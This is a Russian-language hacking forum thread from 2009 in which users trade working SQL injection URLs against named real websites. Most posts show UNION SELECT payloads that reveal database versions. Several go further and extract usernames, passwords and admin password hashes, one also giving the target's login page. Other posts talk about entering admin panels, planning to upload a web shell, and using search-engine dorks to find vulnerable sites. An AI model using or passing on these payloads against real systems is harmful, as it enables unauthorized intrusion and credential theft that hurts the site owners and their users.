1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL-инъекции

Тема в разделе "Поиск уязвимостей", создана пользователем Constantine, 8 май 2007.

  1. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    4.0.27-standard
    Код:
    http://www.eamesgallery.com/cart/prod_cat.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13--
    
    4.1.22-log
    Код:
    http://www.ixus.com.ua/prod_cat.php?id=-26+union+select+version(),2,3/*
    
    Добавлено через 5 часов 2 минуты
    5.0.51a-community
    Код:
    http://elpages.ru/about.php?id=-121+union+select+version()--
    
    Добавлено через 5 часов 9 минут
    4.1.22-log
    Код:
    http://kniga-market.kiev.ua/about.php?id=121&crm=1&tmp=-41+union+select+version()--
    
     
    Последнее редактирование: 7 янв 2009
    6 янв 2009
  2. flem
    flem .адуь Новичок
    Симпатии:
    24
    Код:
    http://english.dvb.no/news.php?id=99997010+union+select+1,version(),3,database(),5,6,USER(),8,9,10,LAST_INSERT_ID(),12,13,14,15,16,17,18,19,20,21--
    5.0.67-0ubuntu6
    Код:
    http://www.teatrdoc.ru/plays.php?id=-3+union+select+1,version(),database()%20,USER(),5--
    Код:
    http://www.mibf.ru/index.php?id=37+union+select+1,2,3,4,5,6,7,8,9,10--

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 50 or greater.**
     
    Последнее редактирование: 7 янв 2009
    7 янв 2009
    2 пользователям это понравилось.
  3. HornetBlack
    HornetBlack Новичок
    Симпатии:
    12
    Спасибо за апдейт - в моей базе этот линк лежал еще нераспотрошенный с четвертой версией мускула :)
     
    7 янв 2009
  4. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    4.0.27-log
    Код:
    http://www.academiaga.ru/index.php?id=-122+union+select+version(),2,3,4--
    
     
    7 янв 2009
  5. Zik
    Zik Модератор
    Симпатии:
    169
    Код:
    http://www.hrcc.org/member.php?id=-464+union+select+1,2,3,4,column_name,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x77656263616C5F75736572+limit+1,1--
    дальше стало не интересно
     
    11 янв 2009
    2 пользователям это понравилось.
  6. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    4.1.22-standard-log
    Код:
    http://www.artmaterial.ru/about.php?content=dealer&id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11,12/*
    
     
    11 янв 2009
  7. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 50 or greater.**
     
    Последнее редактирование: 24 янв 2009
    24 янв 2009
  8. mg-el
    mg-el Продвинутый
    Симпатии:
    41
    Э, вообщем нашел сканером инъекцию. Он выдал мне ссылку (я так понял, что на нее), ну вот не пойму где она там фильтруется, или что там она делает.
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
     
    Последнее редактирование: 29 янв 2009
    29 янв 2009
  9. Zik
    Zik Модератор
    Симпатии:
    169
    mg-el,
    1. делай не активную ссылку
    2. при переходе по твоей ссылке открывает главную страницу сделай подную ссылку

    X-Spider ом сканировал что ли?
     
    Последнее редактирование: 29 янв 2009
    29 янв 2009
  10. mg-el
    mg-el Продвинутый
    Симпатии:
    41
    подредактировал))
    А сканировал Jsky. выдал мне критическую ошибку sql - injection и вот эту ссылку.
     
    Последнее редактирование: 29 янв 2009
    29 янв 2009
    1 человеку нравится это.
  11. Zik
    Zik Модератор
    Симпатии:
    169
    X-Spider ом сканировал что ли?
    __________________
     
    29 янв 2009
  12. flem
    flem .адуь Новичок
    Симпатии:
    24
    Ты так и неответил на вопрос.. Чем сканирувал?
    Ведь знаешь сканер тож может ошибится или дал просто то что тебе ненужна и ты нетак все понял..
    И еше один вопрос те имена нужен этот сайт?если да то приеду с больницы дамой гляну..а еси ты просто наткнулся сканером и ради интереса хочешь довести дело до конца незная шо и как то лутше забей!ведь в гугле можно стока ишо интересных и даж легких скулей найти к примеру по запросу "inurl:news.php?id=1" ;)
     
    29 янв 2009
  13. Zik
    Zik Модератор
    Симпатии:
    169
    flem,
    да зачем так геморно реверс и уаля я уже в админке сижу, сейчас допру как ту шел залить и будет доступ к серваку

    а выбор тут богатый
    кое где даже картон по идеи есть
     
    29 янв 2009
  14. mg-el
    mg-el Продвинутый
    Симпатии:
    41
    jsky ем сканировал. А насчет принципиальности, просто сканировал и наткнулся, хотя на часик доступ в админку бы не помешал... =) а вабще выложил с целью проверить действительно ли эта дыра есть и можно ли ей воспользоваться имея минимум навыка в скул инъекции..
     
    29 янв 2009
  15. Zik
    Zik Модератор
    Симпатии:
    169
    mg-el,
    ну как те сказать
    сайт написан почти на голом хтмле тут скуля не пройдет дсотуп тока через реверс как я писал до этого
     
    29 янв 2009
  16. mg-el
    mg-el Продвинутый
    Симпатии:
    41
    а, спасибо Zik.
    И еще вопросик, не могу найти не одного сайта в котором ?id=1' прокатывает, не подскажете адресс, а то я уже методом тыка с 1000 сайтов перепробывал, надоело уже, а попробывать охото..))
     
    29 янв 2009
  17. Zik
    Zik Модератор
    Симпатии:
    169
    _http://www.bombardier.cv.ua/ 5 бд будет легко уже побывал в админке ловить нечего там
     
    29 янв 2009
  18. faza02
    faza02 Никто Новичок
    Симпатии:
    58
    _http://www.dittberner.com/

    Код:
    http://www.dittberner.com/reports/about.php?id=-5+union+select+1,2,3,4,username,6,7,8+from+user+limit+1,1--
    Код:
    http://www.dittberner.com/reports/about.php?id=-5+union+select+1,2,3,4,password,6,7,8+from+user+limit+1,1--
    varbobitis:6215defe2a2da202

    Код:
    http://www.dittberner.com/login.php
    PR: 5

    Добавлено через 23 часа 46 минут
    Код:
    http://www.palit.biz/main/about.php?id=-1+union+select+1,2,3,4,version(),6,7--
    4.1.21

    тИЦ: 230
    PR: 5

    Код:
    http://www.chicagoloopalliance.com/about.php?id=-193+union+select+1,2/*
    PR: 5
    Код:
    http://www.mlsoftball.com/about.php?ID=-2+union+select+1,2,version()/*
    4.0.27-standard

    PR: 3

    Код:
    http://www.kss-windows.com/next.php?id=-22+union+select+1,2/*
     
    Последнее редактирование: 2 фев 2009
    1 фев 2009
    1 человеку нравится это.
  19. onthar
    onthar Команда форума
    Симпатии:
    311
    Код:
    http://www.empoweredproducts.com/product_one.php?id=-5+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user())/*
    5.0.45:gunoil_db:[email protected]

    Код:
    http://www.laptopik.ru/articles.php?id=-20+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user())/*
    4.1.22-log:wwwlaptopikru:[email protected]

    Код:
    http://koleso.topof.ru/testing_info.php?id=-20+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8/*
    5.0.22:koleso_ktopof:[email protected]
    Тут Зик помог, за что ему спасибо)
    Код:
    http://koleso.topof.ru/testing_info.php?id=-20+UNION+SELECT+1,2,concat(admin_login,char(58),admin_password),4,5,6,7,8+from+admins/*
    Код:
    topof:33d51f16ddaf72afb581e2a223c602a1:4f 
     
    10 фев 2009
    1 человеку нравится это.
  20. Mei
    Mei bit of love Продвинутый
    Симпатии:
    137
    Код:
    http://www.joinava.org/APS4P20081101A/ava.php?id=-34+union+select+concat(username,0x3a,password)+from+cms_users
     
    Последнее редактирование: 11 фев 2009
    10 фев 2009

Поделиться этой страницей

Загрузка...